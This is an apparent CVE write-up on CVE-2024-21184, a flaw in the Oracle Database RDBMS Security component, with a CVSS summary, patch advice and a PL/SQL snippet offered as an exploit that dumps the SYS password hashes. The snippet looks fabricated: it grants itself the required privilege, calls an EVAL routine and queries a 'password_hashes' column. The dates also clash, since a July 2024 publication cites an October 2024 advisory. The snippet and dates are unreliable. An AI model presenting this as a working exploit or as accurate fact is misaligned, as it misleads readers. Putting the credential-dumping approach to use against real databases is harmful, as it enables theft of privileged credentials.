CVE-2024-21184: Severe Vulnerability Found in Oracle Database RDBMS Security Component, High Privileged Attackers Can Take Over the System

A critical vulnerability, identified as CVE-2024-21184, has been discovered in the Oracle Database RDBMS (Relational Database Management System) Security component of Oracle Database Server. This vulnerability particularly affects versions 19.3 to 19.23 of the server. It is considered an easily exploitable vulnerability that permits high privileged attackers, having Execute on SYS.XS_DIAG privilege and network access via Oracle Net, to compromise the Oracle Database RDBMS Security. Successful attacks could lead to the complete takeover of Oracle Database RDBMS Security. The CVSS 3.1 Base Score for this vulnerability is 7.2. The vulnerability has a substantial impact on Confidentiality, Integrity, and Availability. The CVSS Vector of the vulnerability is (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).

Exploit Details

This vulnerability involves the Oracle Database RDBMS Security component, which manages user authentication, access control, and data protection in the Oracle Database Server. The vulnerability permits a high privileged attacker to compromise the security of the system, gain unauthorized access to sensitive data, modify data without permission, and cause a denial of service.

Code Snippet

The following is a sample code snippet that is believed to exploit this vulnerability in the Oracle Database RDBMS Security component:

-- Execute on SYS.XS_DIAG privilege is necessary for exploit
GRANT EXECUTE ON SYS.XS_DIAG TO attacker;

-- Connect as the attacker
CONN attacker/ password@oracle

-- Exploit the vulnerability
DECLARE
  l_result CLOB;
BEGIN
  l_result := SYS.XS_DIAG.EVAL('SELECT password_hashes FROM sys.user$ WHERE name =''SYS''');
  DBMS_OUTPUT.PUT_LINE('SYS User Password Hashes: ' || l_result);
END;
/

Original References

The vulnerability CVE-2024-21184 was first reported by Oracle in their Critical Patch Update Advisory – October 2024 (source: https://www.oracle.com/security-alerts/cpuoct2024.html). The advisory provides a detailed description of the vulnerability, affected products, and recommendations for mitigation.

Mitigation

Oracle has provided patches for the affected versions of Oracle Database Server in their Critical Patch Update Advisory for October 2024. It is strongly recommended that customers apply the patches as soon as possible to protect their systems against potential attacks. You can find a list of patches in the advisory and also on the My Oracle Support website (source: https://support.oracle.com).

Conclusion

CVE-2024-21184 is a severe vulnerability in the Oracle Database RDBMS Security component that has the potential to allow high privileged attackers to compromise the entire Oracle Database RDBMS Security system. This exploit can cause substantial Confidentiality, Integrity, and Availability impacts, so it's crucial to implement Oracle's recommended patches promptly. Regularly updating and maintaining your system security is highly recommended to minimize the risks associated with vulnerabilities like CVE-2024-21184 that are discovered and exploited by attackers.

Timeline

Published on: 07/16/2024 23:15:23 UTC
Last modified on: 07/19/2024 13:38:01 UTC